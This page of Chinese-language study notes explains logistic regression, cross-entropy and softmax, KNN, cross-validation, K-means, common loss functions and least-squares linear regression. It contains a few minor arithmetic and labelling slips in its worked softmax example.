Sigmoid 函数通常定义为:

$$ \sigma(x) = \frac{1}{1 + e^{-x}} $$

为了推导它的导数,我们首先对其进行变形。

$$ \begin{aligned} (1 + e^{-x})·\sigma(x) &= 1\ e^{-x}·(-1)·\sigma(x) + \sigma'(x)·(1 + e^{-x}) &=0\ \sigma'(x)·(1 + e^{-x}) &= e^{-x}·\sigma(x)\ \sigma'(x)&=(1-\sigma(x))·\sigma(x) \end{aligned} $$

最终,我们得到了 Sigmoid 函数的导数:

$$ \sigma'(x) = (1-\sigma(x))\sigma(x) $$

在这个式子中,唯一的变量是 $x$,而对于神经网络,我们可以将指数改写为输入的权重和特征的线性组合:

$$ \begin{aligned}y=\frac{1}{1+e^{-(w^Tx+b)}}\end{aligned} $$

这里得到的 $y$ 是一个概率值,表示输入 $x$ 属于正类的概率。我们可以 将这个概率值与阈值进行比较,以决定输入 $x$ 属于哪一类。

进一步,我们可以得到 $x$ 是正类的 相对概率

$$ \frac{y}{1-y} $$

让我们把这个线性组合加上 Sigmoid 函数组合起来,得到逻辑回归的表达式,其可以用来估计,在给定的模型参数 $w$ 和 $b$ 下,给定输入为 $x$ 时,网络输出 $C_1$ (即将之归类为 $C_1$)的后验概率:

$$ \begin{aligned}P_{w,b}(C_1|x)=\frac{1}{1+e^{-(w^Tx+b)}}\end{aligned} $$

接下来,考虑伯努利分布(二分类)的特殊情况。

对于伯努利分布,我们有:

| 事件 | 概率 | | -------- | ----- | | $P(Y=1)$ | $p$ | | $P(Y=0)$ | $1-p$ |

所以,对于给定的真实分布 $P(Y|X)$,我们可以得到似然函数:

$$ \begin{aligned}P(Y|X)=p^y(1-p)^{1-y}\end{aligned} $$

这里的 $y$ 是 $Y$ 的实际观察值(也即真实标签,要么是 1,要么是 0)。

  • 如果 $Y=1$,似然函数就变成了 $p$
  • 如果 $Y=0$,似然函数就变成了 $1-p$

将其中的 $p$ 替换为逻辑回归的输出 $f_{w,b}(x)$,我们得到了逻辑回归的似然函数:

$$ \begin{aligned}P(Y|X)=L(w,b)=\prod_{i=1}^Nf_{w,b}(x^i)^{y^i}(1-f_{w,b}(x^i))^{1-y^i}\end{aligned} $$

其中,$N$ 是样本的数量,$x^i$ 是第 $i$ 个样本的输入,$y^i$ 是第 $i$ 个样本的真实类别,$f_{w,b}(x^i)$ 是逻辑回归的输出。

这里巧妙的运用了当幂指数为 0 时,结果为 1 的性质。

我们之所以写成上标,是因为后文下标我们要用于表示某个样本的某个特征。

我们可以对之进行取负对数的操作,得到 二分类的负对数似然函数(损失函数,也是交叉熵函数,见下文)

$$ \begin{aligned}-\ln L(w,b)=-\sum_{i=1}^N(y^i\log f_{w,b}(x^i)+(1-y^i)\log(1-f_{w,b}(x^i)))\end{aligned} $$

其中:

  • $y^i$ 是第 $i$ 个样本的真实标签,取值为 0 或 1。
  • $f_{w,b}(x^i)$ 是模型对第 $i$ 个样本的预测概率(逻辑回归的输出)。
  • $N$​ 是样本总数。

这个损失函数在两个方面起作用:

  1. 当真实标签 $y^i = 1$ 时,只考虑 $\log f_{w,b}(x^i)$ 项,鼓励模型预测的概率 $f_{w,b}(x^i)$ 趋向于 1。
  2. 当真实标签 $y^i = 0$ 时,只考虑 $\log (1 - f_{w,b}(x^i))$ 项,鼓励模型预测的概率 $f_{w,b}(x^i)$ 趋向于 0。

这个函数就是逻辑回归的损失函数,我们可以通过最小化这个函数来得到最优的模型参数 $w$ 和 $b$​。

熵和交叉熵

接下来,定义一个非常重要的概念:熵 (Entropy)

:服从某一特定概率分布事件的理论最小平均编码长度。

已知一个离散变量 $i$ 的概率分布 $P(i)$,我们有熵的公式:

$$ \text{Entropy} =-\sum_{n=1}^nP(i)\log_2P(i) $$

而对于连续变量,我们有:

$$ \text{Entropy} =-\int P(x)\log_2P(x)dx $$

我们可以将之统一为:

$$ H(P)=\text{Entropy}=\mathbb{E}_{x\sim P}[-\log P(x)] $$

为什么说熵是理论最小平均编码长度呢?观察上述式子,我们可以发现,如果我们想让他最小,那么当 $P(i)$ 越大,$-\log_2P(i)$ 就要越小,也就是说,当某个事件发生的概率越大,我们对其编码的长度越短。这就是熵的含义。

举个生活中的例子,就是一个发生概率越大的事件,他往往没有什么有效的信息,如 “太阳东升西落”,所以我们对其编码的长度越短,而发生概率越小的事件,他往往包含了更多的信息,如 “明天会下雨”,所以我们对其编码的长度就会越长。

接下来,我们定义 交叉熵 (Cross Entropy)

交叉熵:用来 衡量两个概率分布之间的差异 的。

假设现在有一个样本集中两个概率分布 $p,q$,其中 $p$ 为真实分布。真实分布的熵为:

$$ H(p) = \sum_i p(i) \cdot \log\left(\frac{1}{p(i)}\right) $$

如果采用错误的分布 $q$ 来表示来自真实分布 $p$ 的样本,则平均编码长度应该是:

$$ H(p,q) = \sum_i p(i) \cdot \log\left(\frac{1}{q(i)}\right) $$

可以证明,$H(p,q) \geq H(p)$,当且仅当 $p=q$ 时,等号成立。

关于交叉熵,有几个重要的性质:

  • 交叉熵是非负的
  • 交叉熵等于 真实分布的熵加上 KL 散度
  • 交叉熵是不对称的

其中,KL 散度也是用来衡量两个概率分布之间的差异的,它的定义如下:

$$ D_{KL}(p||q) = \sum_i p(i) \cdot \log\left(\frac{p(i)}{q(i)}\right) $$

将之前提到的,伯努利分布的似然函数带入交叉熵的定义,我们可以立即注意到,逻辑回归的损失函数就是交叉熵。

优化损失函数

接下来,我们就要考虑优化逻辑回归的损失函数了。

在之前的学习中,我们知道我们需要通过梯度下降法来优化损失函数。而计算梯度的过程,我们可以使用链式法则来进行,需要算出损失函数对于模型参数的偏导数。

在此做推导如下:

$$ \begin{align*} -\frac{\partial \ln L(w,b)}{\partial w_i} &= \sum_n -\left[ y^n \frac{\partial \ln f_{w,b}(x^n)}{\partial w_i} + (1 - y^n) \frac{\partial \ln (1 - f_{w,b}(x^n))}{\partial w_i} \right] \ &= \sum_n -\left[ y^n (1 - f_{w,b}(x^n)) x_i^n - (1 - y^n) f_{w,b}(x^n) x_i^n \right] \ &= \sum_n -\left[ y^n - f_{w,b}(x^n) \right] x_i^n \ &= \sum_n -(y^n - f_{w,b}(x^n)) x_i^n \end{align*} $$

其中的推导细节包括:

$$ \begin{align*} \frac{\partial \ln f_{w,b}(x^n)}{\partial w_i} &= \frac{1}{f_{w,b}(x^n)} \frac{\partial f_{w,b}(x^n)}{\partial w_i} \ &= \frac{1}{f_{w,b}(x^n)} f_{w,b}(x^n) (1 - f_{w,b}(x^n)) x_i^n \ &= (1 - f_{w,b}(x^n)) x_i^n \end{align*} $$

对于第二项,类似可推。

观察这个最终的式子:

$$ \begin{aligned} -\frac{\partial \ln L(w,b)}{\partial w_i} = \sum_n -(y^n - f_{w,b}(x^n)) x_i^n \end{aligned} $$

我们可以发现,当模型预测值 $f_{w,b}(x^n)$ 与真实值 $y^n$ 相差越大时,梯度的绝对值就越大,也就是说,遇到预测错误的样本时,我们会对模型参数进行更大的调整

继续,下一步通过梯度下降法来优化损失函数,对于模型参数 $w_i$ 的更新公式为:

$$ \begin{aligned} w_i = w_i - \eta \frac{\partial \ln L(w,b)}{\partial w_i} = w_i - \eta \sum_n -(y^n - f_{w,b}(x^n)) x_i^n \end{aligned} $$

其中,$\eta$​ 是学习率,用来控制每次更新的步长,通常取一个较小的值。

逻辑回归 vs 线性回归

logistic_regression_vs_linear_regression

重点:

  • 逻辑回归是分类问题,线性回归是回归问题。
  • 逻辑回归可以理解为将线性回归的预测映射到 0~1 之间。
  • 逻辑回归的损失函数是交叉熵函数,线性回归的损失函数是均方差函数。

逻辑回归的局限性

逻辑回归是一个线性分类器,它的决策边界是线性的(当 $w^Tx+b=0$ 时,$f_{w,b}(x)=0.5$,此时意味着分为正类或者负类的概率各一半,完全不可分。也就是说,$w^Tx+b=0$​ 就是决策边界)。

这意味着,如果数据的真实分布不是线性可分的(如二维空间下的异或 XOR),那么逻辑回归就无法很好的拟合这个数据。

xor

直观的理解就是,在这个图中,你没法用一条直线分出两个类。

级联的逻辑回归

dnn

深度神经网络 DNN(Deep Neural Network)可以使用级联的逻辑回归搭建,每个节点(或 “神经元”)的工作方式类似逻辑回归,而当多个逻辑回归模块级联在一起时,形成了一个多层的结构,这就是深度神经网络(中间可能要添加一些诸如 ReLU 之类的连接层,见后续课程内容)。

线性分类器

线性分类器:典型的有参方法,通过学习到的参数来进行预测。

我们不能像排序数组一样硬编码一个算法来解决图像分类问题,因而我们通过机器学习,来找到一个函数 $f(x,W)$,其以输入 $x$ 和模型参数 $W$ 为输入,输出一个预测值 $y$。

mlp

可以看到,$W$ 的形状为 $\text{classes} \times \text{features}$ ,$x$ 的形状为 $\text{features} \times 1$ ,$b$ 的形状为 $\text{classes} \times 1$ 。

对于 $W$ 中的每一行,都会与 $x$ 进行乘法(矩阵乘法:左行右列),再加上 $b$ 中的对应元素,最后得到一个 $\text{classes} \times 1$ 的向量,其中的每个元素都代表了 $x$ 归类为此类的得分。

进一步的,我们就可以得到损失函数:

$$ L=\frac{1}{N}\sum_i L_i(f(x_i,W),y_i) $$

其中,$L_i$ 是第 $i$ 个样本的损失函数,$N$ 是样本数量,$f(x_i,W)$ 是模型的输出,$y_i$ 是第 $i$ 个样本的真实类别。

对于线性分类器,我们通常使用交叉熵损失函数:

$$ L_i=-\log\left(\frac{e^{f_{y_i}}}{\sum_je^{f_j}}\right) $$

其中:

  • $f_{y_i}$ 是 $f(x_i,W)$ 中的第 $y_i$ 个元素,代表真实分类所对应的得分,我们想要分类正确,所以会希望这个项越大越好(在损失函数中表达为分子更大,也即分为此类的概率在所有概率中占比更大)
  • $f_j$ 是 $f(x_i,W)$ 中的第 $j$ 个元素,也即预测属于分为 $j$ 类的得分。
  • 总和 $\sum_je^{f_j}$ 是所有分类的得分之和,用于归一化。

关于为什么会得到这个形式,我们做阐述如下:

首先,考虑矩阵乘法,我们得到的可能是个负值,而我们需要输出的是一个概率,所以我们可以通过指数函数来将之转换为正值。也即进行一次 $e^{f_{x_i,W}}$ 操作。

接着,我们还需要保证输出的概率和为 1,所以我们需要对输出的结果进行 归一化。也即进行一次 $\frac{e^{f_{x_i,W}}}{\sum_je^{f_j}}$ 操作。

以上的操作,也被称为 Softmax 操作。

最后,我们运用之前所学过的交叉熵损失函数,其可以衡量我们的预测概率分布和真实概率分布之间的差异:

$$ \begin{aligned} L_i&=-\log P(Y=y_i|X=x_i)\ &=-\log\left(\frac{e^{f_{y_i}}}{\sum_je^{f_j}}\right) \end{aligned} $$

整个过程的计算方式如下:

softmax

这里可以这么想(注意数据不对应):

  1. 假设样本 $x_i$ 对应的真实类别是 Cat(在上图中对应 $y_i = 0$​)

  2. 假设经过模型后,我们预测 $x_i$ 的分类得分是:

    • Cat(0):$f_0 = 1$
    • Dog(1):$f_1 = 2$
    • Ship(2):$f_2 = 3$
  3. 进而,我们进行归一化,得到我们预测 $x_i$ 的分为各类的概率:

    • Cat(0):$P(Cat) = \frac{e^{1}}{e^{1} + e^{2} + e^{3}} = 0.09$
    • Dog(1):$P(Cat) = \frac{e^{2}}{e^{1} + e^{2} + e^{3}} = 0.24$
    • Ship(2):$P(Cat) = \frac{e^{3}}{e^{1} + e^{2} + e^{3}} = 0.67$
  4. 我们将真实分类改为 One-Hot 独热编码,以对齐模型的输出类别,也即从 $y_i = 0$ 转为:

    • Cat(0):$P(Cat) = 1$
    • Dog(1):$P(Cat) = 0$
    • Ship(2):$P(Cat) = 0$
  5. 计算交叉熵:

    $$ L_i = \sum_i p(i) \cdot \log\left(\frac{1}{q(i)}\right) = -\log\left(\frac{e^{f_{y_i}}}{\sum_je^{f_j}}\right) = -\log(0.09) = 1.05 $$

这在形式上,十分类似于 one-hot 编码的 KL 散度:

$$ D_{KL}(P||Q)=\sum_yP(y)\log\frac{P(y)}{Q(y)}\ $$

随后,我们就可以通过梯度下降法来优化损失函数了。而最优参数 $W^*$ 就是使得损失函数最小的参数,也就是我们的优化目标。

线性分类器的局限性

线性分类器是一个有参方法,和逻辑回归一样,它的决策边界也是线性的。这意味着,如果数据的真实分布不是线性可分的(如异或 XOR),那么线性分类器就无法很好的拟合这个数据。

尽管我们可以通过一些诸如坐标变换的方法来将非线性可分的数据变成线性可分的,但这样的方法往往会增加模型的复杂度。

最近邻分类器(Nearest Neighbor Classifier)

最近邻分类器:无参方法(模型没有参数,但是有超参)、监督学习(有分类的标签),通过计算样本之间的距离来进行预测。

其中,距离的计算方法可以选择:

  • L1(曼哈顿距离):$d_1(I_1,I_2)=\sum_p|I_1^p-I_2^p|$
  • L2(欧氏距离):$d_2(I_1,I_2)=\sqrt{\sum_p(I_1^p-I_2^p)^2}$

这个算法依赖于 超参数(Hyperparameters) 的选定:

  • k:选择多少个最近的个样本
  • 距离的计算方法:L1 或 L2

虽然如此,它也有一个很严重的问题,就是它十分依赖于数据的分布。如果数据的分布不均匀,那么最近邻分类器的效果就会很差。

举个例子,当两张原本一模一样的图,其中一张被左右对称了,那么这两张图的距离就会变得很大,这样的话,最近邻分类器就会将这两张图归为不同的类别。

进一步的,我们思考如何设置超参数。

数据集的划分

我们将整个数据集,划分为训练集(Training Set)、测试集(Test Set)和验证集(Validation Set):

  • 训练集:用于训练模型,让模型从数据中学习到特征。训练集通常是整个数据集的大部分,比如 70%~80%。

  • 验证集:用于在训练过程中评估模型的性能,并调整超参数。验证集通常占整个数据集的一小部分,比如 10%~15%。

  • 测试集:模型训练完成后,在测试集上评估模型的最终性能。测试集通常占整个数据集的 10%~20%,必须是模型从未见过的数据。

超参数选择:

  • 可以在 验证数据集(Validation set) 上选择超参数
  • 最后只在测试数据集上运行一次

交叉验证(Cross Validation)

当数据集较小的时候,我们还可以通过设置不同的 折(Fold) 来进行 交叉验证(Cross Validation)

将整个数据集划分为 $k$ 个大小相同的子集,每次使用其中的 $k-1$ 个子集来训练模型,剩下的一个子集来验证模型。最后,将 $k$​ 次的验证结果取平均值,作为最终的验证结果。

在交叉验证中,我们通常只将数据集分为训练集和验证集,测试集在交叉验证之外单独保留。

我们会选择选择 平均结果最好 的超参数。

交叉验证举例说明

假设你有一个数据集,并选择 $k=5$,即将数据集划分为 5 个子集(Fold):

  • 第一次:用子集 1、子集 2、子集 3、子集 4 训练模型,用子集 5 验证模型。
  • 第二次:用子集 1、子集 2、子集 3、子集 5 训练模型,用子集 4 验证模型。
  • 第三次:用子集 1、子集 2、子集 4、子集 5 训练模型,用子集 3 验证模型。
  • 第四次:用子集 1、子集 3、子集 4、子集 5 训练模型,用子集 2 验证模型。
  • 第五次:用子集 2、子集 3、子集 4、子集 5 训练模型,用子集 1 验证模型。

最后,将这 5 次验证的结果取平均值,作为模型的最终性能评估。

k - 近邻分类器(KNN)

在图片分类问题中,我们可以从一个图片和标签组成的训练数据集开始,预测测试图片的标签

K - 近邻分类器根据最近的 K 个训练数据的 标签,来预测测试数据的标签 距离度量方法(Distance metric)最近邻数量 K超参数,需要手动指定。因为有标注数据,所以是 有监督学习

聚类

聚类无监督学习 的一种(没有给出类别标签),通过将数据集中的样本划分为若干个类别,使得同一类别的样本之间的相似度尽可能大(高类内相似度),不同类别的样本之间的相似度尽可能小(低类间相似度)。

聚类具有 主观性

常用的聚类算法:

  • 分割算法
  • 层级算法

分割算法(Parttion algorithms)

分割算法:把 $n$ 个对象分割成 $K$​ 个簇(Clusters),使得每个对象属于且仅属于一个组。

输入:一个对象集,数值 $K$

目标:最优化某个选定分割标准的 $K$ 组分割。

K-means 聚类

一种常用的聚类算法,旨在将数据集分成 K 个簇,使得同一个簇内的数据点之间距离尽可能小,而不同簇之间的数据点距离尽可能大。算法步骤如下:

  1. 随机选择 K 个数据点作为初始簇中心。
  2. 将每个数据点分配给最近的簇中心,形成 K 个簇。
  3. 重新计算每个簇的中心,即每个簇内所有数据点的均值。
  4. 重复步骤 2 和 3,直到簇中心不再变化或变化非常小。

问题:

  1. 对于种子的选择敏感,需要尝试不同的初始种子,且尽量让 $k$ 个初始种子互相远离。
  2. 受离群值(Outliers)影响较大

损失函数总结

交叉熵损失(Cross-Entropy Loss):这是处理 二分类问题 时最常用的损失函数,它衡量的是模型预测概率分布与真实标签的概率分布之间的差异。适用于输出为概率值且目标是最小化分类错误的场景。

由于交叉熵损失经常是在指示真实标签的独热编码和预测输出进行间进行的,所以我们一般会在线性层的输出后追加一个 Softmax 层,来将之转为概率。

所以,通常我们不单独说 Softmax 损失,而是说 使用了 Softmax 函数的交叉熵损失

均方误差损失(Mean Squared Error Loss):通常用于 回归 任务,它衡量的是预测值与真实值之间差的平方的平均值。在二分类任务中较少使用,因为它不是针对概率输出设计的。

Focal Loss:这是一个专为解决类别不平衡问题设计的损失函数。它是交叉熵损失的变体,通过减少易分类样本的权重来增加对难分类样本的关注。在二分类任务中,如果存在极端类别不平衡,可以使用 Focal Loss。

Dice 损失函数:常用于医学图像分割等领域,特别是在 样本不平衡 的情况下。它的计算基于 Dice 系数,这是一种衡量两个样本相似性的统计工具。

Dice 损失函数的形式是 $1 - \frac{2 \times |X \cap Y|}{|X| + |Y|}$,其中 $X$ 是预测结果,$Y$ 是真实标签,$|X \cap Y|$ 是预测与真实标签的交集,$|X|$ 和 $|Y|$​ 分别是预测和真实标签的元素总数。这个损失函数鼓励模型增加预测结果与真实标签的重叠部分。

Hinge 损失函数:通常用于支持向量机(SVM)中,也适用于一些二分类问题。它的目的是找到一个最大化两个类别间隔的决策边界。

Hinge 损失的形式是 $\max(0, 1 - y_i \cdot f(x_i))$,其中 $y_i$ 是真实标签(取值为 + 1 或 - 1),$f(x_i)$ 是模型对样本 $x_i$ 的预测值。当预测正确且置信度高(即 $y_i \cdot f(x_i) > 1$)时,损失为 0;否则损失随着错误预测的置信度增加而增加。

也可以参见 yyHaker / 常见的损失函数(loss function)总结

监督学习 / 无监督学习总结

有监督学习(Supervised Learning)

特点

  • 使用 标注好 的训练数据,即每个样本都有相应的目标输出(标签)。
  • 模型通过学习输入和输出的关系,进行预测或分类。
  • 需要大量的标注数据进行训练。

常见的监督学习

  • 线性回归:预测房价,输入特征包括房屋面积、位置、年龄等,输出为房价。
  • 逻辑回归:二分类问题,如判断邮件是否为垃圾邮件。

无监督学习(Unsupervised Learning)

特点

  • 使用未标注的训练数据,即样本没有对应的输出标签。
  • 模型试图自行发现数据中的结构和模式。
  • 常用于 聚类、降维 等任务。

常见的无监督学习

  • K - 均值聚类 (K-Means Clustering):根据特征将数据点聚集成不同的组,如市场细分。
  • 主成分分析 (PCA):降维技术,用于数据可视化或预处理。
  • 自编码器 (Autoencoder):用于特征提取和降维。
  • 词嵌入 (Word Embedding):将单词映射到低维空间,用于自然语言处理。
  • 密度估计 (Density Estimation):估计数据的概率密度函数,用于异常检测。注意密度估计既可以是无参数的,也可以是有参数的(假定先验分布)。

有参数学习 / 无参数学习总结

有参数学习(Parametric Learning)

特点

  • 假设函数形式已知,参数数量固定。
  • 学习过程中主要是确定这些参数的最优值。
  • 一旦学习完成,预测新数据时不再需要原始训练数据。

常见的有参数学习

  • 线性回归:$y = \beta_0 + \beta_1x_1 + \beta_2x_2 + ... + \beta_nx_n$,其中 $\beta_0, \beta_1, ..., \beta_n$ 是需要学习的参数。
  • 逻辑回归:$y = \frac{1}{1 + e^{-(\beta_0 + \beta_1x_1 + \beta_2x_2 + ... + \beta_nx_n)}}$,其中 $\beta_0, \beta_1, ..., \beta_n$ 是需要学习的参数。
  • 词嵌入:将单词映射到低维空间,通过学习词向量的参数。
  • 卷积神经网络:通过学习卷积核的参数,提取图像特征。
  • 循环神经网络:通过学习循环层的参数,提取序列数据的特征。
  • 深度神经网络:通过学习多层网络的参数,提取复杂的特征。

无参数学习(Nonparametric Learning)

特点

  • 不对函数形式做出严格假设,参数数量可能随着数据量的增加而增加。
  • 更加灵活,可以拟合复杂的数据结构。
  • 需要更多的数据来避免过拟合。

常见的无参数学习

  • 最近邻分类器:根据最近的训练数据点来预测新数据点的标签。

💾

机器学习介绍与线性模型

2024年3月8日 08:09

机器学习

机器学习,指通过算法的设计与分析,使得:

  • 模型的 表现 得到提升
  • 在某些 任务
  • 基于 经验

机器学习的任务

  1. 有监督学习:这种方式需要提前给模型提供 “正确答案”,让模型在学习过程中有明确的参照。比如:

    • 分类问题:判断输入数据属于哪个类别,例如判断一封邮件是不是垃圾邮件。
    • 回归问题:预测一个连续值,例如预测房屋的价格。
  2. 无监督学习:模型在没有 “正确答案” 的情况下自我学习,它会尝试理解数据的结构。

    • 聚类:将数据分组,组内相似度高,组间相似度低,例如将顾客分为不同的群体。
    • 密度估计:估计数据生成的概率分布,例如在数据中找出异常点。
    • 降维:减少数据的复杂性,同时保留重要特征,例如用于数据可视化。
  3. 半监督学习:结合了有监督和无监督学习,使用大量未标记数据和少量标记数据进行学习。

  4. 弱监督学习:标记数据不完全、不确切或不可靠,但仍旨在通过这些不完美的标记来进行学习。

  5. 强化学习:模型通过与环境的交互来学习,它试图找出在给定情况下的最佳动作,以最大化所获得的奖励。

机器学习的经验

训练数据 vs 测试数据

一个好的机器学习算法:

  • 不会过拟合(overfit)
  • 训练数据可以泛化(generalize)到测试数据

机器学习的表现

表现的衡量方法:从一个随机测试数据 $X$,衡量真实标签 $Y$ 和预测 $f(X)$ 之间的接近程度

二元分类(Binary Classification)

二元分类是一个简单的分类问题,只有两个类别的结果。

损失函数为 0/1 损失,即如果预测正确,损失为 0;预测错误,损失为 1。

二元分类的 0/1 损失函数

$$ \text{loss}(Y, f(X)) = 1{f(X) \neq Y} $$

其中,$1{}$ 是指示函数,当 $f(X)$(预测值)不等于 $Y$(真实值)时,结果为 1,表示有损失;否则结果为 0,表示没有损失。

回归(Regression)

在回归任务中,我们预测 连续的输出值

损失函数为 平方损失,即预测值与真实值之差的平方。

回归的平方损失函数

$$ \text{loss}(Y, f(X)) = (f(X) - Y)^2 $$

这里 $(f(X) - Y)^2$ 表示预测值 $f(X)$ 与实际值 $Y$ 之间差的平方。这个值越小,表示预测越准确。

密度估计(Density Estimation)

密度估计是 估计输入数据概率分布 的任务。

密度估计属于 无监督学习,它的目标是估计一个变量的概率分布。这不需要标签数据。

损失函数为 负对数似然损失,这里衡量的是模型对真实分布的拟合程度。

密度估计的负对数似然损失函数

$$ \text{loss}(f(X)) = -\log(P_f(X)) $$

其中,$P_f(X)$ 是模型预测的数据点 $X$ 的概率(也即模型认为数据点 $X$ 出现的可能性)。负对数似然损失函数衡量的是模型对数据生成概率的估计与实际分布的拟合程度。这个值越小,表示模型的估计越接近真实分布。

机器学习的理想目标

机器学习的目标是构建适用于任何测试数据点 $(X, Y) \sim P_{XY}$ 的预测规则 $f : \mathcal{X} \to \mathcal{Y}$ ,它可以最小化损失函数的期望值:

$$ \min_f \mathbb{E}_{XY} [\text{loss}(Y, f(X))] $$

其中,$\mathbb{E}{XY}$ 表示对联合分布 $P{XY}$ 的期望,$\text{loss}(Y, f(X))$​ 是预测误差。

但是,我们并不知道数据的真实分布情况,无法直接求解这个式子。

为此,我们通过使用引入训练数据(可以看做是经验)来近似这个期望。

训练数据可以表示为 ${(X^{(j)}, Y^{(j)})}{j=1}^n$ ,它提供了关于 $P{XY}$ 分布的一些信息。

如此一来,我们的目标就变成了

$$ \min_f \frac{1}{n} \sum_{j=1}^n \text{loss}(Y^{(j)}, f(X^{(j)})) $$

线性模型

线性模型:线性模型就是要学习特征 $X$ 的一种线性组合来进行预测,进行运算 $y = wX + b$,其中 $w$ 是 $X$ 的权重,$b$ 是偏置,$y$ 是预测值。

我们希望通过学习得到最优的 $w$ 和 $b$,使得预测值 $y$ 与真实值(ground truth) $y_{GT}$ 的误差最小。

其中,$X$ 具有 $n$ 个特征,$X = (x_1, x_2, ..., x_n)$,其每个分量都代表一个特征,$y = w_1x_1 + w_2x_2 + ... + w_nx_n + b$,是 $X$ 各个特征的线性组合。

线性回归:给定数据 $D = {(x_1, y_1), (x_2, y_2), \ldots, (x_n, y_n)}$, 用一个线性模型估计最接近真实 $y$ 的连续标量: $f(x_i)=w^T \cdot x_i + b$, 也就是要 $f(x_i) \approx y_i$

其中,$(w, b)$ 是要学习的模型参数。

也就是要:

$$ f^{*} = \arg \min_f \mathbb{E} [ ( f ( X )-Y )^{2} ] $$

由于我们不能无限地获得数据,所以我们只能通过有限的数据来估计这个期望,也就是:

$$ f^{*}= \arg \min_f \frac{1}{N} \sum_{i=1}^{N} ( f ( x_i )-y_i )^{2} $$

这也被称为 Empirical mean(经验均值)。

其中,$n$ 是数据的数量,$x_i$ 是第 $i$ 个数据的全部特征,$y_i$ 是第 $i$ 个数据的真实值,$f(x_i)$ 是第 $i$ 个数据的预测值。

根据大数定理,当数据量足够大时,经验均值会趋近于期望,也就是:

$$ \frac{1}{n} \sum_{i=1}^{n} loss ( x_{i}, y_{i} ) \overset{n \to\infty} {\longrightarrow} \mathbb{E}_{X, Y} [ loss ( X, Y ) ] $$

我们可以通过最小二乘法来获取最优的 $w$ 和 $b$。

我们选择以线性代数来表示这个问题,也就是 Least Squares Estimator(最小二乘估计):

$$ \begin{aligned} (w^{}, b^{}) &= \arg \min \sum_{i=1}^{n} ( f ( x_{i} )-y_{i} )^{2} \ &= \arg \min \sum_{i=1}^{n} ( y_{i}-w x_{i}-b )^{2} \end{aligned} $$

我们将之转为矩阵形式:

$$ \mathbf{A}=\left[\begin{matrix}{X_{1}}\{\vdots}\{X_{n}}\\end{matrix}\right]=\left[\begin{matrix}{X_{1}^{(1)}}&{\dots}&{X_{1}^{(p)}}\{\vdots}&{\ddots}&{\vdots}\{X_{n}^{(1)}}&{\dots}&{X_{n}^{(p)}}\\end{matrix}\right],\quad Y=\left[\begin{array}{c}{y_{1}}\{\vdots}\{y_{n}}\end{array}\right],\quad \beta=\left[\begin{array}{c}{w_{1}}\{\vdots}\{w_{p}}\end{array}\right] $$

注意这一步的 $\mathbf{A}$ 的每一行代表一个数据 $X_i$,每一行除了最后一列,都是 $X_i$ 的特征,最后一列是 $1$,这是一个小的 trick,因为这样做的话,我们就可以把 $b$ 合并到 $\beta$ 中,也就是:

$$ \mathbf{A}=\left[\begin{matrix}{X_{1}^{(1)}}&{\dots}&{X_{1}^{(p-1)}}&{1}\{\vdots}&{\ddots}&{\vdots}&{\vdots}\{X_{n}^{(1)}}&{\dots}&{X_{n}^{(p-1)}}&{1}\\end{matrix}\right],\quad \beta=\left[\begin{array}{c}{w_{1}}\{\vdots}\{w_{p-1}}\{b}\end{array}\right] $$

我们可以得到:

$$ \begin{aligned} \hat{\beta} &= \arg\min_{\beta} \frac{1} {n} \sum_{i=1}^{n} ( X_{i} \beta-Y_{i} )^{2} \ &= \arg\min_{\beta} \frac{1} {n} ( \mathbf{A} \beta-\mathbf{Y} )^{\mathrm{T}} ( \mathbf{A} \beta-\mathbf{Y} ) \end{aligned} $$

其中,$\hat{\beta}$ 是最优的 $w$,也就是我们要求的结果。

简化这个式子,去掉和优化无关的 $\frac{1}{n}$ ,我们可以得到:

$$ \begin{aligned} J(\beta) &= ( \mathbf{A} \beta-\mathbf{Y} )^{\mathrm{T}} ( \mathbf{A} \beta-\mathbf{Y} ) \ &= \beta^{\mathrm{T}} \mathbf{A}^{\mathrm{T}} \mathbf{A} \beta- \beta^{\mathrm{T}} \mathbf{A}^{\mathrm{T}} \mathbf{Y}- \mathbf{Y}^{\mathrm{T}} \mathbf{A} \beta+ \mathbf{Y}^{\mathrm{T}} \mathbf{Y}\ &= \beta^{\mathrm{T}} \mathbf{A}^{\mathrm{T}} \mathbf{A} \beta-2 \beta^{\mathrm{T}} \mathbf{A}^{\mathrm{T}} \mathbf{Y}+\mathbf{Y}^{\mathrm{T}} \mathbf{Y}\ \quad \frac{\partial J(\beta)}{\partial \beta} &= 2 \mathbf{A}^{\mathrm{T}} \mathbf{A} \beta-2 \mathbf{A}^{\mathrm{T}} \mathbf{Y} = 0 \ \end{aligned} $$

这里第三个等号利用了中间两项互为转置且均为标量的性质合并了他们。第四个等号则应用了矩阵求导的性质。

如果 $\mathbf{A}$ 可逆,那自然可以根据上式求出 $\beta$ 的解:

$$ \hat{\beta}=( \mathbf{A}^{\mathrm{T}} \mathbf{A} )^{-1} \mathbf{A}^{\mathrm{T}} \mathbf{Y} $$

但是,很多情况下,$\mathbf{A}$ 并不可逆,比如 $n < p$ 时,我们可以证明它一定不可逆。而且即使 $\mathbf{A}$ 可逆( 此时要求样本个数 $n$ 要大于等于待估参数量 $p$,包含截距项,同时 $\mathbf{A}^T\mathbf{A}$ 满秩 / 可逆,我们称此式有闭式解 ),当它的维度很大时,计算也是很昂贵的。

所以,我们可以通过梯度下降法来求解最优的 $\beta$。

gd

梯度下降法的思想是:从随机选取的 $\beta$ 开始,每次沿着梯度的反方向走一步(走的多长由学习率 Learning Rate 决定),直到收敛。只要这个损失函数是凸函数,我们总能优化到最优点。

贝叶斯统计

$$ \begin{aligned} &\max_{\beta}p(D|\beta)p(\beta)=\max_{\beta}\log p(D|\beta)+\log p(\beta)\\ &\hat{\beta}{\mathrm{MAP}}=\arg\max{\beta}\underbrace{\log p\left({(X_i,Y_i)}{i=1}^n\mid\beta,\sigma^2\right)}{\log\text{likelihood}} + \underbrace { \log p \left ( \beta \right )}_{\log\text{prior}} \end{aligned} $$

第一行的含义是,我们要最大化数据的似然函数和参数的先验概率的乘积。

  • 似然函数表示数据($D$)在给定参数 $\beta$ 的情况下出现的概率
  • 先验概率表示我们在看到数据之前对参数的信念。

最大化这个乘积等价于最大化它们的对数,因为对数是单调递增的函数。

第二行的第一个项代表的含义是,在给定参数 $\beta$ 和方差 $\sigma^2$ 的情况下,数据出现的概率。

在统计模型中:

  • $\beta$ 通常代表模型的系数
  • $\sigma^2$ 代表模型中的噪声或误差的方差。即使我们有了 $\beta$,我们还需要知道数据中的变异性(或不确定性)有多大,这就是为什么 $\sigma^2$ 是重要的。

